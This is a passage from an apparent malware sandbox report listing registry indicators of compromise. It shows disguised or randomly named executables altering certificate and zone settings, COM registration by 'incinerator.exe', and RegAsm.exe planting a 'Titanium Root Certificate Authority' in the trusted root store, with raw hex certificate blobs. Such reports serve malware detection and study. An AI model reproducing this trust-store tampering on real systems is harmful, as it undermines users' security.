Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-751 = "Tonga Daylight Time" windefender.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" vJkRBwz.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" tboJHJHII9Q9oJjVSOI6pAdI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" tboJHJHII9Q9oJjVSOI6pAdI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" tboJHJHII9Q9oJjVSOI6pAdI.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" tboJHJHII9Q9oJjVSOI6pAdI.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ CCtCNtF.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2532 = "Chatham Islands Standard Time" windefender.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" vJkRBwz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe -
Modifies registry class 64 IoCs
Processes:
incinerator.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeregsvr32.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E2ED38AC-BD32-4164-BB38-30573675E8D5}\LocalServer32 incinerator.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 02cf4b80fd96da01 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 79a5a480fd96da01 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\Certificates MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C4831C1C-E17D-4711-BDF2-0FD935DC2F39}\1.0\ = "Incinerator" incinerator.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9081C77F-9FAF-4551-A878-10A4249CD1FA}\InProcServer32 regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E2ED38AC-BD32-4164-BB38-30573675E8D5}\ProgID\ = "Incinerator.IncineratorImpl" incinerator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D90EF6CF-32CB-476D-B57C-1A71E58E8301}\ = "Incinerator" regsvr32.exe Set value (data) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 3ab534c2fe96da01 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F148A78C-91B1-45DC-83A9-291108F3B245}\InProcServer32\ThreadingModel = "Apartment" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{603D0C8E-469F-460A-BCBB-BBF6E90A7C15}\TypeLib\ = "{C4831C1C-E17D-4711-BDF2-0FD935DC2F39}" incinerator.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = 706755ef2ca8da01 MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D90EF6CF-32CB-476D-B57C-1A71E58E8301}\ShellFolder\PinToNameSpaceTree regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CTLs MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Incinerator.2\ = "Incinerator" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D90EF6CF-32CB-476D-B57C-1A71E58E8301}\ShellEx\PropertySheetHandlers regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\m.facebook.com\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CTLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe -
Processes:
RegAsm.exe7MIpvZeCZgl5ZPeAuQtK9vkn.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 7MIpvZeCZgl5ZPeAuQtK9vkn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e 7MIpvZeCZgl5ZPeAuQtK9vkn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f06035504